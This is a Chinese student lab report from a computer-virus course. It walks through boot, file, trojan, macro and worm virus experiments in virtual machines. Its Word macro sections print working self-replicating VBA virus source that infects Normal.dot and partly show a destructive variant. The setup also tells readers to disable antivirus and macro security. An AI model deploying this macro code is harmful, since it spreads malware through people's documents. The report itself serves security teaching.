计算机病毒及防治实验报告081310128王晨雨

　南京航空航天大学 计算机病毒及防治 上机实验报告

　 学院：

　理学院 专业：

　信息与计算科学 学号：

　081310128 姓名：

　王晨雨 授课老师：

　薛明富

　二〇一六年十二月

　目录 实验一：引导型病毒实验.............................................. 2 实验二：Com 病毒实验 ................................................ 6 实验三：PE 文件格式实验 ............................................. 9 实验四：32 位文件型病毒实验 ........................................ 11 实验五：简单的木马实验............................................. 14 实验七：木马病毒清除实验（选做）................................... 20 实验八：Word 宏病毒实验（一）

　...................................... 23 实验九：Word 宏病毒实验（二）

　...................................... 29 实验十：Linux 脚本病毒实验（选做）

　................................. 34 实验十二：基于 U 盘传播的蠕虫病毒实验............................... 35 实验十三：邮件型病毒实验........................................... 38 实验十四：Web 恶意代码实验 ......................................... 41

　实验一 ：引导型病毒实验 【实验目的】

　 通过实验，了解引导区病毒的感染对象和感染特征，重点学习引导病毒的感染机制和恢复感染病毒文件的方法，提高汇编语言的使用能力。

　实验内容 引导阶段病毒由软盘感染硬盘实验。通过触发病毒，观察病毒发作的现象和步骤，学习病毒的感染机制：阅读和分析病毒的代码。

　DOS 运行时病毒由硬盘感染软盘的实现。通过触发病毒，观察病毒发作的现象和步骤，学习病毒的感染机制：阅读和分析病毒的代码。

　【实验平台】

　】

　VMWare Workstation 12 PRO MS-DOS 7.10 【试验内容】

　】

　第一步：环境安装 安装虚拟机 VMWare，在虚拟机环境内安装 MS-DOS 7.10 环境。

　第二步：软盘感染硬盘 1) 运行虚拟机，检查目前虚拟硬盘是否含有病毒，图 1 表示没有病毒正常启动硬盘的状态。

　2) 在附书资源中复制含有病毒的虚拟软盘 virus.img 3) 将含有病毒的软盘插入虚拟机引导，可以看到闪动的字符*^_^*，如图 2 所示，按任意键进入图 3。

　第三步：验证硬盘已经被感染 1) 取出虚拟软盘，通过硬盘引导，再次出现了病毒的画面如图 4。

　2) 按任意键后正常引导了 DOS 系统如图 5。可见，硬盘已被感染。

　第四步：硬盘感染软盘 1) 下载 empty.img，并且将它插入虚拟机，启动计算机，由于该盘为空，如图 6. 2) 取出虚拟软盘，从硬盘启动，通过命令 format A:/q 快速格式化软盘。可能提示出错，这时只要按 R 键即可。如图 7. 3) 成功格式化后的结果如图 8。

　4) 不要取出虚拟软盘，重新启动虚拟机，这时是从 empty.img 引导，可以看到病毒的画面，如图 9。按任意键进入图 10.可见，病毒已经成功由硬盘传染给了软盘。

　实验截图：

　1. 软盘启动后：

　2. 硬盘启动后：

　实验二：Com 病毒实验 【实验目的】

　 1、掌握 COM 病毒的传播原理。

　2、掌握 MASM611 编译工具的使用。

　 【实验平台】

　】

　 1、MS-DOS 7.10 2、MASM611

　 【试验内容】

　】

　 1、 安装 MS-DOS 7.10 环境。虚拟机安装该环境亦可，步骤在此不再赘述。

　2、 在 MS-DOS C:\MASM 目录下安装 MASM611，然后将 binr 目录下的 link.exe 复制到 bin目录下。

　3、 在 com 目录下复制病毒程序 Virus.asm 及测试程序源代码 BeInfected.asm 4、 编译链接 BeInfected.asm，形成 BeInfectedcom 测试程序 5、 编译链接 virus.asm，生成病毒程序 virus.exe。

　6、 在 C:\MASM\Bin 目录下建立 del.txt 文件，并且将“test.com”和病毒代码 2“virus.asm”复制到此目录下。

　7、 执行“test.com”观察结果。

　8、 编译并连接 “virus.asm” 生成“virus.exe”，执行此 exe 文件以感染“test.com”文件并且自动删除 del.txt，而后执行“test.com”可以发现感染后的结果。

　实验截图：

　1. 编译存储好文件：

　 2. Dos 下查看文件夹内容：

　3. 查看 TEST 的内容：

　4. 运行病毒程序：

　5. 查看感染病毒后文件夹内容：

　6. 查看感染病毒后 TEST 的内容：

　 实验三：PE 文件格式实验 【 实验目的 】

　了解 PE 文件基本结构 【 实验环境 】

　运行环境：Windows 2000、Windows 9x、Windows NT 以及 Windows XP 编译环境：

　Visual Studio 6.0 【 实验步骤 】

　使用编译环境打开源代码工程，编译后可以生成 winpe.exe。

　预备步骤：找任意一个 Win32 下的 Exe 文件作为查看对象。

　实验内容：运行 winpe.exe，并打开任一 exe 文件，选择不同的菜单，可以查看到 exe 文件的内部结构。

　 实验截图：

　 感染前

　感染后

　 第一处：

　第二处：

　 第三处：

　 第四处：

　 第五处：

　感染前：

　感染后：

　 实验四：32 位文件型病毒实验

　 【 实验目的】

　】

　 了解文件型病毒的基本制造过程  了解病毒的感染、破坏机制，进一步认识病毒程序  掌握文件型病毒的特征和内在机制

　【 实验环境】

　】

　运行环境 Windows 2000、Windows 9x、Windows NT 和 Windows XP

　【 实验步骤】

　】

　目录中的 virus.rar 包中包括 Virus.exe(编译的病毒程序)、软件使用说明书.doc(请仔细阅读)、源代码详解.doc（对代码部分加入了部分注释）以及 pll.asm(程序源代码)。Example.rar包中选取的是一个常用程序(ebookedit)安装后的安装目录下的程序，用于测试病毒程序。

　预备步骤：将 example.rar 解压到某个目录。解压完毕后，应该在该目录下有 Buttons目录、ebookcode.exe、ebookedit.exe、ebrand-it.exe 以及 keymaker.exe 等程序，然后把virus.rar 包解压后的 Virus.exe 复制到该目录中。

　实验内容：通过运行病毒程序观看各步的提示以了解病毒的内在机制。

　实验截图：

　1.感染前准备：

　 2.感染过程：

　3.感染后：

　 4.感染文件比对

　 实验五：简单的木马实验 【 实验目的】

　】

　掌握木马的基本原理 【 实验环境】

　】

　 Windows XP 操作系统  Visual Studio 6.0 编程环境 【 实验步骤】

　】

　（1）

　复制实验文件到实验的计算机上。其中，SocketListener 目录下是木马 Server 端源代码，SocketCommand 目录下是木马 Client 端源代码。

　（2）

　用 Visual Studio 6.0 环境分别编译这两部分代码。

　（3）

　运行 SocketListener 应用程序，也就是启动了木马被控端。

　（4）

　运行 SocketCommand 应用程序，也就是启动了木马的控制端，可以在控制端执行命令来控制被控制端。实验支持的命令参考表：

　 命令 命令含义 CMD 执行应用程序 !SHUT 退出木马 FILEGET 获得远程文件 EDITCONF 编辑配置文件 LIST 列目录 VIEW 查看文件内容 CDOPEN 关 CD CDCLOSE 开 CD REBOOT 重启远端计算机

　实验截图：

　1.建立连接：

　2.发送指令及成功后结果：

　（1）

　运行程序：

　（2）

　关闭木马：

　（3）

　获得文件：

　（4）

　编辑配置文件：

　（5）

　查看文件：

　 （6）

　查看文件内容：

　 （7）

　重启计算机：

　 实验七 ：木马病毒清除实验（选做）

　【 实验目的】

　】

　掌握木马病毒清除的基本原理 【 实验平台】

　】

　 Windows 32 位操作系统  Visual Studio 7.0 编译环境 【 实验步骤】

　】

　文件 Antitrojan.sln 为工程文件。使用 Visual Studio 编译该工程，生成 Antitrojan.exe 可执行程序。执行 Antitrojan.exe 观察执行效果。

　实验截图：

　1. 确认木马存在：

　2. 进行编译：

　 （1）

　修改试验机名字：

　（2）

　添加查杀代号：

　（3）

　添加查杀代码：

　3. 清除成功：

　 实验八：

　：Word 宏病毒实验 （一）

　实验目的

　Word 宏是指能组织到一起为独立命令使用的一系列 Word 指令，它能使日常工作变得容易。本实验演示了宏的编写，通过两个简单的宏病毒示例，说明宏的原理及其安全漏洞和缺陷，理解宏病毒的作用机制，从而加强对宏病毒的认识，提高防范意识。

　实验所需条件和环境

　硬件设备：局域网，终端 PC 机。

　系统软件：Windows 系列操作系统 支撑软件：Word 2003 软件设置：关闭杀毒软；打开 Word 2003，在工具宏安全性中，将安全级别设置为低，在可靠发行商选项卡中，选择信任任何所有安装的加载项和模板，选择信任 visual basic 项目的访问 实验环境配置如下图所示：

　受感染终端受感染Word文档被感染终端 宏病毒传播示意图 实验内容和分析

　为了保证该实验不至于造成较大的破坏性，进行实验感染后，被感染终端不要打开过多的 word 文档，否则清除比较麻烦（对每个打开过的文档都要清除）。

　 例 例 1 自我复制，感染 word 公用模板和当前文档 代码如下：

　"Micro-Virus Sub Document_Open() On Error Resume Next Application.DisplayStatusBar = False Options.SaveNormalPrompt = False Ourcode = ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(1, 100) Set Host = NormalTemplate.VBProject.VBComponents(1).CodeModule If ThisDocument = NormalTemplate Then

　 Set Host = ActiveDocument.VBProject.VBComponents(1).CodeModule End If With Host

　 If .Lines(1.1) <> ""Micro-Virus" Then

　 .DeleteLines 1, .CountOfLines

　 .InsertLines 1, Ourcode

　 .ReplaceLine 2, "Sub Document_Close()"

　 If ThisDocument = nomaltemplate Then

　.ReplaceLine 2, "Sub Document_Open()"

　 ActiveDocument.SaveAs ActiveDocument.FullName

　 End If

　 End If End With MsgBox "MicroVirus by Content Security Lab" End Sub 打开一个 word 文档，然后按 Alt+F11 调用宏编写窗口（工具宏Visual Basic宏编辑器）,在左侧的 project—>Microsoft Word 对象ThisDocument 中输入以上代码，保存，此时当前 word 文档就含有宏病毒，只要下次打开这个 word 文档，就会执行以上代码，并将自身复制到 Normal.dot（word 文档的公共模板）和当前文档的 ThisDocument 中，同时改变函数名（模板中为 Document_Close，当前文档为 Document_Open），此时所有的 word文档打开和关闭时，都将运行以上的病毒代码，可以加入适当的恶意代码，影响 word 的正常使用，本例中只是简单的跳出一个提示框。

　 代码解释 以上代码的基本执行流程如下：

　1) 进行必要的自我保护 Application.DisplayStatusBar = False

　Options.SaveNormalPrompt = False 高明的病毒编写者其自我保护将做得非常好，可以使 word 的一些工具栏失效，例如将工具菜单中的宏选项屏蔽，也可以修改注册表达到很好的隐藏效果。

　本例中只是屏蔽状态栏，以免显示宏的运行状态，并且修改公用模板时自动保存，不给用户提示。

　2) 得到当前文档的代码对象和公用模板的代码对象 Ourcode = ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(1, 100) Set Host = NormalTemplate.VBProject.VBComponents(1).CodeModule If ThisDocument = NormalTemplate Then

　 Set Host = ActiveDocument.VBProject.VBComponents(1).CodeModule End If

　3) 检查模板是否已经感染病毒，如果没有，则复制宏病毒代码到模板，并且修改函数名。

　With Host

　 If .Lines(1.1) <> ""Micro-Virus" Then

　 .DeleteLines 1, .CountOfLines

　 .InsertLines 1, Ourcode

　 .ReplaceLine 2, "Sub Document_Close()"

　 If ThisDocument = nomaltemplate Then

　.ReplaceLine 2, "Sub Document_Open()"

　 ActiveDocument.SaveAs ActiveDocument.FullName

　 End If

　 End If End With 4) 执行恶意代码 MsgBox "MicroVirus by Content Security Lab"

　实验截图

　：

　1.复制代码

　2.感染病毒后现象

　3.感染其他文档

　 实验九：

　：Word 宏病毒实验（ 二）

　）

　例 例 2 具有一定破坏性的宏 我们可以对上例中的恶意代码稍加修改，使其具有一定的破坏性（这里以著名宏病毒“台湾一号”的恶意代码部分为基础，为使其在 word2003 版本中运行，且降低破坏性，对源代码作适当修改）。

　完整代码如下：

　"moonlight Dim nm(4) Sub Document_Open() "DisableInput 1

　Set ourcodemodule = ThisDocument.VBProject.VBComponents(1).CodeModule

　 Set host = NormalTemplate.VBProject.VBComponents(1).CodeModule If ThisDocument = NormalTemplate Then

　 Set host = ActiveDocument.VBProject.VBComponents(1).CodeModule End If With host If .Lines(1, 1) <> ""moonlight" Then

　.DeleteLines 1, .CountOfLines .InsertLines 1, ourcodemodule.Lines(1, 100) .ReplaceLine 3, "Sub Document_Close()"

　 If ThisDocument = NormalTemplate Then

　 .ReplaceLine 3, "Sub Document_Open()"

　 ActiveDocument.SaveAs ActiveDocument.FullName

　 End If

　End If

　End With

　Count = 0 If Day(Now()) = 1 Then try:

　 On Error GoTo try

　 test = -1

　 con = 1

　tog$ = ""

　 i = 0

　 While test = -1

　 For i = 0 To 4

　 nm(i) = Int(Rnd() * 10)

　 con = con * nm(i)

　 ...

推荐访问:计算机病毒 防治 实验